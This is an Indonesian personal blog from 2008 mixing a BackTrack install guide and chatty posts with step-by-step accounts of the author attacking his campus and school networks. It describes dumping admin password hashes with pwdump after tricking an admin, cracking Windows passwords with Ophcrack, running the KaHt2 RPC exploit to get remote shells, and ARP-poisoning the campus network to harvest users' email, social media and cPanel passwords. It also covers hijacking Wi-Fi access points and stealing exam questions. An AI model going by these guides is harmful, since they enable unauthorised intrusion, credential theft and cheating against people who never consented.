Salah satu lagi kelebihan distro Backtrack menurut saya adalah tampilan desktop KDE dengan theme yang sangat menarik, dan juga memiliki efek ’glass window’ yaitu window yang terbuka pada bagian pinggirnya terlihat bening, hingga terlihat gambar wallpaper desktop kita. Microsoft Windows Vista juga mempunyai fitur ini pada desktop Aero, namun pada windows sangat dirasakan penurunan performa yang sangat besar pada saat penggunaan fitur ini, sedangkan pada Backtrack saya tidak merasakan penurunan performa yang sangat besar. Pada dasarnya Linux memang lebih mementingkan performa dibandingkan interface, karena pada Linux interface hanya sebagai pemanis.

Saat ini distro Backtrack sudah sampai pada versi 3.0 yang masih dalam tahap ’BETA’, dan mempunyai compability terhadap hardware yang lebih baik dibandingkan versi sebelumnya juga yang pasti sudah melakukan patch terbaru terhadap bug yang telah ditemukan, dan sudah menggunakan kernel terbaru.

Installasi Backtrack di hard disk

Download Disc Image (.iso) Backtrack di http://www.remote-exploit.org/backtrack_download.html
Lakukan burning disc image pada CD-RW dengan kecepatan paling rendah, proses burning bisa dilakukan dengan software semacam Ahead Nero
Masuklah ke setup bios komputer anda, terdapat berbagai cara untuk masuk ke BIOS, tergantung dari developer BIOS komputer anda.
Pastikan boot priority adalah CD drive anda, agar komputer melakukan booting dari CD yang telah kita buat. Apabila boot priority masih pada HDD, lakukan perubahan dan melakukan save pada setup BIOS.
Setelah melakukan setup BIOS, masukan CD Backtrack ke CD Drive, dan restart komputer, hingga komputer melakukan booting Backtrack
Setelah booting selesai, akan muncul login screen. Ketik username: root dan password: toor
Saya asumsikan anda mempunyai OS Windows pada hard disk yang sama, dan mempunyai sisa space yang belu di partisi (Unpartioned).
Untuk mengamankan partisi lain yang sudah ada di hard disk anda, anda harus melakukanb umounting partisi tersebut
Ketik mount untuk melihat partisi mana aja yang aktif digunakan oleh Backtrack, lihat pada sebelah kanan yang terdapat tulisan ntfs, berati partisi tersebut berisi partisi windows (ntfs), ketik umount /dev/hda# dimana # adalah nomor partisi tersebut. Hda merupakan partisi dari hard disk biasa, sedangkan untuk SATA ditulis sda. Linux enggunakan filesystem ext,ext2 atau ext3 (terbaru).
Selanjutnya kita akan membuat partisi linux, pada dasarnya untuk menjalankan Backtrack cukup hanya menggunakan 1 partisi saja, namun untuk optimasi dapat kita pecah hingga 3 partisi. Yaitu partisi untuk boot, filesystem, dan swap. Pada makalah ini saya melakukan 2 partisi, yaitu partisi Backtrack(boot&filsystem) dan Swap.
pada console ketik fdisk /dev/hda untuk masuk ke perintah partisi linux. Anda dapat mengeetik m untuk melihat perintah apa saja yang dapat dijalankan.
Ketik p untuk melihat partisi apa saja yang ada pada hard disk yang kita gunakan. Saya asumsikan anda mempunyai 2 partisi windows yang sudah ada, jadi misalnya ada di /dev/hda1 dan /dev/hda2. Jadi kita akan melakukan partisi Linux pada /dev/hda3 untuk boot & data, sedangkan /dev/hda4 untuk swap.
Ketik n untuk mebuat partisi baru, kemudian pada pilihan partition number, ketik angka 3. Pada pilihan first Cylinder, langsung tekan enter untuk membiarkan nilai default nya, dan pada pilihan size ketik +5000M Sebenarnya Backtrack hanya membutuhkan space partisi sebanyak 3 GB, namun saya alokasikan sebesar 5 GB.
Kemudian ulangi langkah ke 13 untuk membuat partisi Swap, namun pada pilihan partisi ketik angka 4, dan pada pilihan Size harus disesuaikan dengan besarnya memori ram yang komputer anda gunakan, ada yang mengatakan untuk performa yang baik besarnya swap harus 2x dari besar ram memori anda. Misalnya anda mempunyai RAM sebesar 1024 Mb, berati pada pilihan size kita isi +2048M.
Kemudian kita harus melakukan perubahan jenis pada partisi ke-4 yang akan dijadikan Swap. Ketik t keudian pilih partisi ke-4, dan kemudian ketik Hexadecimal untuk Linux Swap, yaitu 82
Setelah pembuatan partisi selesai ketik w untuk melakukan write partisi yang baru tersebut, kemudian ketik reboot untuk restart komputer anda, pastikan koputer masih melakukan booting melalalui CD. Kembali lakukan login.
Kemudian kita akan melakukan format terhadap partisi yang baru saja kita buat, ketik mkfs.ext3 /dev/hda3 yaitu melakukan format ext3 pada partisi hda4.
Ketik mkswap /dev/hda4 untuk melakukan format Linux swap, keudian ketik swapon /dev/hda4 untuk mengaktifkan swap pada partisi hda4.
Lakukan reboot kembali, dan login ulang.
Ketik startx untuk masuk ke KDE.
Pilih pada menu backtrack, terdapat pilihan ’Install Backtrack’, pilih source dari CD ROM (default), lalu pilih installasi pada partisi dev/hda3, dan MBR di tulis pada /dev/hda. Kemudian pilih real install, dan klik install.
Setelah proses installasi selesai, kita melakukan editing terhadapat boot loader (LILO), agar kita mempunyai pilihan booting pada saat komputer dijalankan.
Ketik nano etc/lilo.conf pada console backtrack (Konsole), dan lakukan perubahan seperti ini :

================LILO=====================
lba32 #Allow booting past 1024 cylinder with a recent BIOS
boot = /dev/hda
# message = /boot/boot_message.txt
prompt
timeout = 200
change-rules
reset
vga=791
#Windows configuration begins
root = /dev/hda1
label = WinXP
tabe = /dev/hdal
#Windows configuration ends
# Linux Configuration begins
image = /boot/vmlinuz
root = /dev/hda3
label = BACKTRACK2
read-only
# Linux Configuration begins

Ctrl + W (buat save)
Ctrl + X (buat exit)

Ketik lilo –v dan pastikan tidak muncul pesan error.
Kemudian lakukan reboot, dan keluarkan CD Backtrack dari drive anda.
Installasi selesai, anda dapat melakukan double booting pada saat boot komputer.

Crack Password Windows tanpa basa-basi

2008-01-27T03:12:00.000+07:00

Udah baca posting gw sebelum-nya 'Hack Jaringan Kampus (Part I)? Disitu gw menjelaskan cara mendapatkan password Admin, dengan cara 'Dump' dan kemudian men-Crack nya.. Itu merupakan jalan 'bersih' nya.. Kalo mau yang bener2 frontal.. gunakan Ophcrack..

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

1. Download Ophcrack-live CD, lebih enak yg versi CD :)
2. Begitu selesai di download, file nya ekstensi .iso, burn image-nya ke cd, pake nero/else
3. Begitu image-nya udah di burn.. maka udah siap deh untuk digunakan berperang..
4. Cari komputer windows target, yang ada CD-Rom pastinya..
5. Masukin CD nya..
6. Reboot PC
7. begitu reboot, dia langsung masuk ke Ophcrack...
8. Tinggal ikutin aja petunjuk-nya.. ga bakal gw jelasi.. kalo emang ga bisa.. mending ga usah dah.. mudah banget kok..
9. Done... udah gituu sajaa... mudah kan :)

Exploit DCOM RPC dengan KaHt2

2008-01-27T02:00:00.000+07:00

Yup.. punya target komputer" Windows Xp SP1 kebawah ?? dan lebih lagi mereka tidak mempunyai firewall??

Ada exploit pada windows2 lama, yaitu exploit pada port 135, yaitu pada port milkin RPC (Remote Procedure Call). Singkat kata, untuk yang satu ini gw ga bakal panjang2 masalah 'logika' penyerangan yang dilakukan exploit ini.. emang gw rada ga ngerti, akrena source code tool-nya bikin puyeng buat di pelajarin.. Intinya, exploit ini mengirimkan buffer yang berlebihan sehingga host target dapet di 'takeover'.

Masi ga tau komputer target lo Operating System nya apa? gunakan NMAP. NMAP gunanya untuk meng-scan port mana saja yang terbuka, agar kita bisa tahu kelemahan komputer mana yang bisa kita gunakan.. Jadi yang sebelom-nya gw jelasin.. Exploit yang sedang gw bahas ini menggunakan port 135.. jadi kalo dari hasil scan Nmap, ternyata port 135 pada komputer target terbuka.. berati komputer dapat di exploit.
Gw ga bakal ngejelasin cara pake Nmap, karena bila lo download versi Wind0ls nya, udah GUI.. pasti gampang lo make-nya.. just read the manual.

Oke.. kaloo ternyata port 135 bisa digunakan, download dulu Kaht2.. Cari di google, dengan search key 'download kaht2' pasti banyak banget.. Sebelom lo download, lebih baik anti virus komputer lo di matiin dulu, karena Kaht2 itu dikira virus oleh AV, oleh karena itu gw ga memberikan link langsung.. dan membiarkan kalian mencarinya sendiri :) *sebener-nya males upload*

maaf sebelum-nya ga bisa ngasi gambar.. too lazy .. :) komentar aja di post ini kalo ga ngerti yah..

1. Ekstrak kaht2 ke drive C:\
2. buka kaht2 dari command prompt (mis: c:\kaht2.exe)
3. Begitu kaht2 kebuka.. Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]
4. ikutin aja kata penggunaaan nya.. Ip1 -> ip awal untuk mulai scan, Ip2 -> ip akhirnya..
5. Dia akan Scan Ip" tersebut yang bisa si exploit dan akan otomatis bila berhasil.. dia langsung meberikan root commnad prompt target pada anda..
6. selamat bersenang-senang..

contoh command iseng : shutdown -s -t 60 -c "Komputer ngantuk.. mau tidurrr!!"
nanti di kompute rkorban, keluar system error, yang membuat komputer target akan shutdown dalam hitungan 60 detik dan memberikan 'comment' yang lucu2.. ahaha.. kalo ga mau ketauan itu hasil 'jail' tulis aja yang serius2.. macem 'Windows has encounter a fatal error' wakaka... Kenaaa dee.. :P

File Transfer Protocol (FTP)

2008-01-27T00:22:00.000+07:00

Karena gw abis buka forum temen, yang ada menanyakan masalah FTP.. jadi gw bikin aja disini.. upload gambarnya ga repot abisan.. ahahah.. langsung aja..

FTP (File Transfer Procol), atau bisa di artikan secara kasar nya 'protokol khusus melayani transfer file', dia menggunakan Port 21.
FTP guna-nya buat upload-download maupun untuk organize data pada sebuah komputer maupun server. Bagi gw, FTP gunanya buat upload/download data di web hosting tempat gw nge-hosting website gw. FTP jauh lebih cepat & mudah dibanding gw harus menggunakan file transfer yang diberikan cpanel..
mau coba FTP?, kalo dirumah lo ada lebih dari 2 komputer yang masuk dalem 1 jaringan, atau punya hostingan yg nyediain FTP ? bisa kok di uji coba

mau repot nya.. bisa langsung pake Command Prompt,
Start -> Run.. -> cmd

begitu command prompt keluar, ketik [B]FTP[/B]
terus ketik [B]open [/B]
masukin id ama pass deh,,
sekarang lo bisa buka2 deh pake command2 standard.. macem 'dir' dan sebagainya..

Pusing ama command prompt ? ?
sengaja gw kasi yang susah dulu.. ahaha..
bagi yang pengen tampilan lebih 'Visual' bisa coba Program FTP andalan gw..
CuteFTP silahkan di liat2.. untuk crack udah bertebaran banyak di google aja..

Udah itu aja FTP yang gw ketahui.. semoga bermanfaat.. ahaha :)

Dowload Mp3 di Mutiply masi bisa kok. :)

2008-01-26T16:01:00.000+07:00

Smua pasti udah tau Multipy kan? Semacam blog juga, tapi lebih terkenal sebagai tempat pencarian mp3 paling mudah.. ahahaha..
Tetapi belom lama ini, skarang udah ga bsia download mp3 di multiply.. biasanya di 'fitur' search nya.. ada search music, buat nge-mudahin kita2 buat cari music yang di download..
Lalu, di blog itu juga kita ga bisa ada 'download' dari playlist mereka..
cuman bisa denger streaming.. buat apaa?? :(

Buat nge-gantiin fitur search multiply, gunakan mbah google untuk mencari-nya.. contoh search key : judul/artis_lagu site:multiply.com
Begitu dapet.. cari bagian blog yang nampilin playlist (tab Music)
Begitu udah di playlist.. kan ada tulisannya 'Play this Playlist'
Klik kanan -> save target as..
Terserah deh lo mau save diamana itu file..
Nah.. hasil file yang di download itu ekstensi .m3u *kalo ga salah*, lo buka file-nya pake notepad, open with -> notepad *kalo lo dobel klik... yg ada streaming dia pake winamp/WMP/else*
nah begitu udah kebuka.. pusing deh lo liat url2 ga jelas.. nah skarang ini pinter2 nya elo untuk cari source file nya. Url berawal dari yg 'Http://' sampai sebelom tanda 'kotak'. Itu Char kotak artinya pembatas dari Url"..

klik kalo mau di gedein..

Pilih salah satu URL yg lo pengen, copy paste ke browser.. dan selamat mendownload.. :)

BackTrack 3 Beta Released !!

2008-01-25T22:24:00.000+07:00

Yup.. binggung cari tools" hack? mending langsung aja pake distro linux yang satu ini!!

Distro ini merupakan hasil kerja bareng dari pembuat dua distro yang sudah dikenal baik dalam masalah 'sistem keamanan' yah.. dengan kata lain.. untuk penetrasi jaringan yaitu Auditor Security Collection dan Whax. Backtrack sampai sekarang masih banyak digunakan, gara2 dulu pas taun 2006 dia merupakan #1 Security Live Distribution oleh insecure.org.

Yang asiik nya lagi, di backtrack tuh udah langsung ada Metasploit, buat yang ga tau.. Metasploit tuh isi-nya macem2 kumpulan exploit2.. banyak deh pokoknya.. versi wind0ls nya sih ada.. tapi lebih asik di backtrack..
Mempublikasikan Posting
Tapi inget loh.. yang ini masih beta.. kalo lo mau yang stabil plih aja dulu yang versi 2. Binggung make nya? cari di gramedia, kemaren baru abis ke gramed (blok m) gw liat tuh buku yang ngulas semua tentang BackTrack, include CD *kalo ga salah*.. Gw tadinya pengen beli sih.. tapi lagi ga ada duit.. lebih milih beli komik conan gw.. ahaha.. :)

Download nih.. ada versi ISO CD, ada juga yang versi USB :) mantap.. beli 1 Flash Disk khusus buat isi ginian, kayaknya seru.. apalagi kalo lg ga bawa laptop..

BackTrack 3 Beta

silahkan.. semoga bermanfaat.. ahaha :)

Game Vs Belajar

2008-01-24T15:38:00.000+07:00

"Arkaaa!! jangan maen mulu.. belajarrr !!"

Mungkin itu kata2 yang sering keluar dari mulut nyokap gw sejak gw mulai suka main game, kira2 hingga gw sampe lulus sma.
Game,, menurut gw game itu bukan sesuatu yang jelek kok.. bisa di katakan, ilmu yang gw dapet selama ini sebagian besar 'bermula' dari game. :)

Semua bermulai ketika gw masih SD, alm. bokap gw yang emang kerja-nya dibidang komputer, lebih tepatnya dia bagian Electronics Data Processing (EDP) di sebuah bank luar swastaa.. Gw sih jaman dulu, sampe sekarang juga ga begitu ngerti pekerjaanya kayak gmn.. tapi kata nyokap gw sih ngurusin 'mainframe2' gitu..

Gw dikasi game yang masi dikemas 'cie elah bahasa gw' berbentuk floppy disk 5 1/4" jadul gila kan? komputer juga belom ada OS" an.. pure command prompt.. Bokap gw cuman ngajarin perintah2 dasar seperti 'dir', 'cd', dsb.. sisa nya gw coba2 sendiri,, gara2 bokap gw orang nya kerja mulu, jadi kadang2 kalo ga ada dia.. gw coba deh otak-atik sendiri.. gw baca manual nya.. walaupun b.ing yang pada saat itu gw belom ngerti, gw coba2 aja deh tuh.. dan akhirnya gw bisa maenin game DOS sendiri.. Game yang membuat gw 'mau' untuk ngoprek komputer, dan maksa gw ngerti bahasa inggris!

akhirnya.. sekitar taun 95an++ windows keluar kan tuh.. gw mulai deh, main game2 sederhana bawaan windows, macem solitaire, minesweeper, dan favorit gw jaman dulu Pinball.. Pada saat itu, 'mouse' masih merupakan benda 'asing' bagi sebagian orang.. inget banget gw pada saat gw ke kantor nyokap gw dulu, mereka pada mlototin gw pada saat gw maen komputer.. katanya "ih kok bisa si pake mouse nya lancar banget" secara mereka2 butuh untuk di training dulu, nah gw.. kerjaan nya main game.. ya secara ga langsung gw makin lancar... Makin sering main game, makin lancar pake komputer.

Contoh lain buat pernyataan gw yang sebelum-nya.. Pasti semua tau game online kan? gw dulu pernah maen Nexia, Gunbound, RYL, Ragnarak Online. RO terkadang masi gw maenin.. sayang.. dulu ngebangun char-nya bertahun-tahun :) Gw ambil contoh RO, ini tuh game MMORPG dimana kita bisa berpetualang bareng sama temen2.. komunikasi nya ? CHAT jadi, misalkan kita lagi mau perang dan sebagai nya.. dibutuhkan tangan yang lancar buat ngetik perintah ke temen /dsb nya.. Ditambah lagi untuk ngendaliin char kita kan? menurut gw sih.. walaupun sekarang emang ngetik gw masih blepotan, yang pasti lebih cepet dari gw sebelom gw maen game online. Nah lebih lagi.. gw punya banyak temen.. dan gw kenal ama cewe gw yang sekarang, dari Game juga kok :)

Sekarang.. apa hubungannya dengan 'Belajar' seperti pada judul?

banyakk.. contohnya.. mau install game pc, lama2 jadi ngerti komputer kan? apa lagi kalo cd bajakan, jadi ngerti pake crack.. nah terus.. game nya hang.. cari2 di internet buat ngebenerin nya.. mau cara curang main game? otak atik deh game nya..

Dari game, yang emang bener2 berasa pengaruh-nya buat gw adalah Ragnarok.. tapi, bukan gameplay ato sebagai nya yah.. Terkenal program 'BOT' di RO, fungsinya kita ga perlu seharian depan komputer, tapi char RO kita di naekin sama BOt itu.. nama program nya dari jaman ke jaman banyak perubahan, dari yang dulu Revemu, V-Kore, Vx-Kore, dan untuk yang saat ini OpenKore..

Kenapa ngaruh buat belajar? Untuk konfigurasi Bot tersebut, dapat dikatakan 'susah' bagi gw dulu.. lalu gw juga 'modify' program tersebut, agar sesuai keiingan gw, gw ubah2 tuh source code nya.. yang kalo ga salah merupakan bahasa pemrogaman C++ maupun PERL. Gw mulai mengerti masalah2 seperti itu.. OpenKore juga yang menjadi pengasilan gw pada saat gw sma, dengan membuka jasa Bot. Gw juga lebih kreatif dalam pemrogaman, mungkin ada yang ga ngerti yah.. dulu gw bisa bikin 'pasukan bot' untuk bantu gw perang.. semuanya gw program sendiri.. ahaha...

Dan pengalaman gw selama itu, akhirnya SANGAT membantu gw dalam jurusan Teknik Informatika, begitu dapet mata kuliah 'Algoritma & Pemrogaman I' yang pake C++, pas hari pertama, gw uda pede.. karena gw udah pernah pake.. makasi yah buat dosen saya, akhirnya dapet 'A' :)

Jadi gimana? masih mikir2 mau jadi gamer? banyak kok manfaat-nya menurut gw, asal 'bener'.

Yaudah,, makasi buat teman2 yang udah baca blog saya yang ga penting ini.. :)
ingat.. jangan sampai Belajar menggangu MAIN !! ahahaha

Teka teki lembar jawaban

2008-01-24T14:01:00.000+07:00

Pasti ada yang langsung nanya? Judul apaan sih maksud nya??
ahaha.. gw juga binggung mau kasih judul apa sebenernya..
setelah gw posting mengenai Remote Anywhere (RA) sebelum-nya, akhirnya gw baru keinget akan pengalaman lain gw di sma..
Lo semua yang pernah sma pasti tau yang namanya LJK (Lembar Jawaban Komputer) kan?
Yup, itu adalah lembar jawaban modern yang menggunakan sebuah kertas, yang pada saat kita mau ngisi jawaban, harus dengan susah payah kita 'urek2' ampe item itu buletan jawabannya.. kalo buletinnya ga bener bisa jadi jawaban kita ga kebaca :(

Nah, gw punya guru yang sangat 'unik' dia ngajar pelajaran Komputer.. Enaknya pas pelajaran komputer, kita tuh pasti ke lab.. dan ituu.. amat sangat adem AC nya.. Pelajarannya menurut gw *bukannya sombong ya* tapi gw nguasain banget deh.. kalo ulangan gw yang pertama kali keluar terus.. yah nilainya minimal diatas 8.. Adalah salah2 dikit gara2 ga teliti gw bacanya..

Skarang yang pengen gw 'share' pengalaman-nya adalah, si guru komputer ini selalu membuat 'pola' jawaban pada LJK, tentunya pola dengan jawaban yang benar..

untuk refresh.. kira2 begini lembar jawaban gw jaman sma dulu :

Nah.. bagaimana pola yang gw maksud tadi? ada banyak sekali macem2 nya... jadi pada intinya.. gw cuman perlu mengerjakan 5 nomor pertama dengan bener, dan sisanya.. gw ga perlu liat soal lagi.. yang perlu gw liat hanya LJK.. ahaha.. aneh bukan?

orang2 ngerjain ulangan melototin soal, nah gw melototin Lembar jawaban.. :)

Begini contohnya.. beberapa pola yang biasa gw temuin slama menghadapi ulangan komputer di sma:

Geser kanan/kiri sebanyak beberapa bulatan...

Jadi di pola ini, biasanya dia nge-geser jawaban ke kanan/kiri sebanyak beberapa bulatan.. kalo misalnya udah mentok.. ngulang lagi ke A.

Item -> jawaban yang harus yakin bener
merah -> tebak pola nya

2. Pola Kaca

Kalo yang ini.. di huruf 'C' itu se akan2 jadi cermin.. jadi misalnya yang tadi di nomor 1 itu 'A' berati nomor 6 jawaban-nya 'E'

Itu aja sih contoh dari 'Pola' yang gw maksud, semoga kalian ngerti.. ahaha..
Hanya share pengalaman gw dengan guru yang 'unik' ini.. tiap taun pola nya selalu berkembang.. ada juga yang pake gabungan berbagai pola, abis itu pola nya tiap 5 nomor ganti.. dan banyaak deeh..

tapi pada akhirnya, gw tetep melakukan Riddle ini hingga lulus dari sma, yang ternyata UAS pun masi ada kayak gini.. tapi Pola nya.. amit2 bikin puyeng.. tapi emang,, setelah gw nebak pola, gw tetep harus cek jawabannya.. yah gampang juga pelajarannya.. cuman jadi lebih menantang.. ini udah kayak rahasia umum, gw selalu bareng sama temen baik gw yang namanya 'Ardya' yang biasa duduk depan kursi gw kalo ulangan, untuk mecahin teka-teki ini..

Guess what? UAS pelajaran komputer gw, no 1 se-sma gw.. ahaha.. 9koma gitu deh...
Yup.. sukses.. semoga orang tua ngerti yah.. kan namanya juga usaha.. tapi jalan yang lain.. :)
toh kalo disuru jalan normal, gw juga yakin kok bisa dapet bagus... ahahah

Hack Jaringan Kampus (Part II)

2008-01-24T12:11:00.003+07:00

Yup.. lanjutin dari posting gw sebelumnya..

Setelah gw berhasil masuk sebagai admin di lab komputer Kampus, gw udah bisa mulai bereksperimen tentang jaringan kampus gw, gw mencoba memahami sedikit topologi jaringan komputer di kampus gw itu..

Gw mencoba beberapa tools untuk memahami jaringan kampus, misalnya dengan Angry IP Scanner mulai deh gw tau komputer apa aja yang nyambung di jaringan ini.

Terus gw mencari gateway internet dengan menggunakan perintah tracert di command prompt, dan akhirnya gw dapet gateway internetnya.. yaitu 192.168.1.1.

Oke.. gw udah dapet gateway internet-nya.. sekarang saat nya 'Jail'..
Gw coba sniffing jaringan menggunakan Cain & Abel, untuk tutor lengkapnya bisa dapet disini lengkap banget tutornya.

Gw install deh tuh program di komputer, *cari tempat yg di pojok2*. Program nya harus dijalanin oleh administrator.. Jadi biar gampang, gw tetep login sebagai user biasa, tapi pas gw mau jalanin tuh program, gw klik-kanan dulu, terus run-as administrator..

Gw aktifin sniffer nya dan coba scan semua mac address di jaringan (klik tanda '+').. begitu semua komputer udah ke scan, gw klik tab 'APR' dan klik tanda '+' untuk milih komputer mana yang mau diracunin.. di tabel kiri gw pilih gateway internet, dan di kanan.. gw pilih semua komputer yang nyambung ke jaringan.

APR ? mungkin ada yang belom tau.. kepanjangannya adalah ARP Poison Routing, nah ARP itu apa??

ARP itu Address Resolution Protocol, yaitu protokol yang membantu komputer2 untuk dapat saling mengenali satu sama lain.. nih penjelasan wiki nya..
Jadi pada konsep nya, pada sebuah jaringan data dikirim melalui paket"..
Misalnya komputer dengan ip 192.168.0.1 ingin mengirim paket ke 192.168.0.10, dia akan mengirim paket tersebut ke semua host lainnya (misalnya 192.168.0.2 ~ 192.168.0.9), tapi paket hanya dapat diterima oleh IP yang dituju.

Inilah fungsi Cain & Abel, dia dapat mengendus paket2 tersebut.. sedangkan fungsi APR tersebut, dapat menciptakan man-in-the-middle. Sehingga kita dapat menyadap transaksi paket yang sedang dilakukan pada sebuah jaringan.

Oke, balik lagi ke prakteknya.. begitu selesai saya aktifkan APR.. saya tinggalkan komputer Lab saya, karena saya ada kelas.. saya tekan ctrl+del dan *buff* C&A langsung ngumpet dr taskbar..

setelah selesai kelas, saya ternyata mendapatkan hasil yang sangat banyak sekali.. dari id password FS, Email yahoo, facebook, hingga ada juga Cpanel dari sebuah website ?? Wow.. sampe2 email dari admin yang pake webmail kampus aja gw dapet password nya...

tapi emang niat gw dari awal, hanya 'jail' gw ga melakukan sedikit pun tindakan destruktif pada account2 tersebut.. *yahh.. ngintip dikit laah.. test doang.. :)*

nih screenshoot nya,,,

dan pada akhirnya 'Jackpot' gw berhasil dapet password accesspoint WiFi di kampus gw..
Kampus gw kira2 punya 6 Access Point, dan yang berhasil gw dapet passwordnya 3 accespoint.. karena passwordnya sama semua... passwordnya : antis

ahaha.. gw seneng banget kalo lg minjem notebook temen gw, kalo lg lelet internetnya sengaja gw kasi mac filter di accesspoint, jadi khusus mac address notebook gw aja yang bisa connect ke accesspoint tersebut.. *kadang2 doang sih.. ga tega juga gw :) * kagak terlalu ngacir juga sih koneksinya..

sempet deh tu,,, beberapa bulan, gw secara diam2 memegang kendali dari 3 accesspoint, yang sinyal nya kuat di tempat biasa kita nge-WiFi... tapi sekarang password nya udah diganti sama si admin :( ya sudalah.. kapan2 gw cari lagi.. nunggu ampe punya notebook deh.. biar enak.. hehe

sedang mencoba untuk menyadap jaringan utama kampus.. doakan berhasil :)
mohon bantuan nya bagi kk2 yang sudah ahli yah..

makasi udah baca blog amatiran seperti saya ini..

Information Belongs to Everyone

2008-01-24T10:23:00.000+07:00

Mungkin ada yang merhatiin dibawah judul blog gw... kata2 tersebut.. kenapa gw nulis gitu?? karena ini berdasarkan pengalaman gw aja yah.. dulu gw selalu pengen cari tau masalah hack2-an tapi susah banget gw dapet informasinya.. dari ada temen 'chat' gw yang katanya bisa 'hack' tapi dia ga pernah mau ajarin gw..

Jadi gw bermaksud di blog gw yang satu ini.. gw bisa berbagi informasi dan ilmu gw yang seadanya ini.. Berharap bisa bermaanfaat yah..

ini ada beberapa forum maupun website yang sangat membantu gw dalam mendalami dunia komputer.. Gw ucapin terima kasih banget pada orang2 disana.. karena emang buka wawasan gw banget.. Thx..

Itu aja sih website yang sering gw masukin.. mungkin untuk beberapa temen yang udah 'mahir' juga udah pada tau yah.. maap dong,, saya masih pemulaa.. :)

Remote Anywhere (RA)

2008-01-24T09:22:00.000+07:00

Yah.. kalo yang udah baca posting gw sebelumnya.. tentang pengalaman gw bisa main warnet gratis semasa gw smp.. sekarang gw bakal ceritain pengalaman gw waktu gw sma dulu..

Beda sama SMP gw.. SMA gw punya lab komputer yang lumayan bagus.. udah windows.. kalo smp gw dulu masih DOS, ekskul komputernya cuman belajar Lotus dll ga penting dah.. ahahah..
nah di sma gw.. mayan deh.. windows,, abis itu ada internetnya.. walaupun rada lelet sih..

Mayan deh.. pelajaran Komputer di sma bikin gw semangat.. yg pertama.. Materinya menurut gw gampang banget, microsoft office gitu.. tapi pas kelas 3 lumayan menantang sih.. gw belajar HTML sederhana..

Yup.. udah aja intro nyaa..

Gw mulai kepikiran.. bisa ga yah gw kendaliin komputer" di lab tersebut.. jadi gw bisa ngerjain temen2 gw.. akhirnya gw cari lagi di om Google.. dan akhirnya gw mulai dapet yang istilahnya ternyata 'remote desktop'.. mulai deh gw coba cari2.. dan pada akhirnya gw dapetin software yang namanya Remote Anywhere (RA).

Maap yah gw ga bisa ngasi link maupun screenshoot nya.. disini gw cuman bakal ceritain pengalaman gw aja,, maklum udah lama kejadiannya.. waktu gw sma kelas 1~2. Tanya om google aja kalo mau cari.. :D

Jadi kira2.. itu program punya 2 bagian.. yang pertama Program induk nya.. dan ada 'Slave'-nya.. yang setelah gw sekarang mulai mengerti, ini sebenernya menggunakan konsep 'Trojan'.

Jadi begitu RA di install, dia secara otomatis nyebarin 'slave' di seluruh jaringan yang terhubung.. gw sih dulu ga ngerti banget.. kok bisa yah.. yang penting gw berhasil dapet kendali dari sebagian besar jaringan komputer sma gw..

dari tempat gw pertama kali install, gw bisa ngendaliin semuanya.. dan gw bisa liat komputer mana aja yang berhasil di susupin slave.exe kalo misalnya ada komputer yang belom bisa gw kendaliin.. gw datengin komputer nya.. gw copy slave.exe terus gw dobel klik dah.. kelaarr...

Akhirnya gw bisa ngendaliin lab komputer gw, gw bisa ngendaliin cursor mouse temen2 gw..
Gw ngerjain temen2 gw yg cewe, gw gerakin mouse nya.. terus gw ketik2.. gw bilang 'ini' hantu .. tapi mereka dengan bodohnya percayaaa! ahaha.. sumpah kalo bisa ketawa ngakak.. gw waktu itu ketawa abis2an... kira2 begini yang gw tulis..

"Halo.. saya penunggu disini.. saya sudah muak hidup.. tolong jangan duduki saya.."

spontan tuh cewe ber-2 langsung stress dan bediri dari kursi komputer nya.. terus ngaciirrr.. wakakaka.... gila aja.. hantu jaman sekarang bisa pake komputer.. bukan main..

Akhirnya.. gw cuman coba2 buka komputer guru2 dari situ.. dan gw ga sengaja pernah 1x dapet soal ulangan.. tentunya begitu ulangan gw ga gw isi bener semua.. ada beberapa yang gw salahin.. kalo ga salah dulu soal Komputer.. gw coba cari soal2 mata pelajaran yang lain.. tapi ga ketemu".. ternyata gw baru tau kalo komputer2 yang dipake buat bikin soal ulangan itu ga nyambung sama jaringan komputer lab sma gw...

Yah mungkin itu guru komputer lagi ngerjain soal ulangan di komputer server lab kali yahh?? yah hoki.. mayan deh waktu itu ulangan komputer, gw ga perlu belajar terlalu serius.. jadi bisa gw belajar Fisika yang harinya bersamaan sama ulangan komputer.. :)

Hack Jaringan Kampus (Part I)

2008-01-24T01:16:00.000+07:00

Yah.. inget2 lagi pas gw baru masuk kuliah..

Kampus gw lumayan lah komputernya, punya 2 lab komputer + Koneksi Internet 24hr + WiFi.
Wah enak banget niih pikir gw.. tapi mungkin lebih enak lagi kalo punya notebook *ga punyaaa... beliin dong buat gw*

Seperti biasanya, buat komputer di Lab gw cuman dapet user biasa.. ga bisa install dll.. Gw rada penasaran sih, *jail* bisa ga yah gw tau ni password Admin nya.. kan seru bisa ngerjain orang.. hehe..

gw coba cek OS, ternyata udah baru.. Windows XP Service Pack 2.. waahh repot nii.. kalo service pack 1 kebawah bisa langsung ditembak pake Kaht2, ga ampe 10 detik udah dapet root admin.

Karena gw lumayan sering nagkring di lab.. akhirnya gw rada kenal sama admin lab nya.. yah ngobrol2 aja gituu *social engineering.. heheh*

Akhirnya.. gw minta tolong sama si Admin, untuk login ke komputer gw sebagai Administrator, karena gw perlu untuk install software buat tugas pemrogaman gw, yang 'emang' belom ada di komputer gw..

Begitu gw dapet user admin-nya, dia install deh tuh program.. sambil nunggu install dia pergi dulu ke komputer lain..

begitu dia pergi, gw langsung cepet2 colok Flash disk gw.. gw copy pwDump6.rar ke komputer gw, terus gw extract folder 'pwdump' di drive C.

nah..gw langsung buka command prompt, Start -> Run -> ketik: cmd

begitu command prompt udah kebuka, gw langsung pindah ke folder pwDump yang udah gw ekstrak tadi dengan ngetik cd c:\pwdump

Nah di dalem nya ada 3 File kan, imokav, pwdump sama file .dll-nya.. kita ketik

pwdump.exe -o psw.txt 127.0.0.1

127.0.0.1 -> IP local host komputer
-o psw.txt -> membuat file hasil 'dump' ke file psw.txt

Nah.. tinggal tunggu ga lama.. akhirnya proses selesai...
gw langsung buka folder pwdump, copy psw.txt ke flash disk gw.. dan segera menghilangkan jejak.. ahaha..

mungkin kalo dihitung.. itu gw lakuin kira2 cuman 2~3 menit..
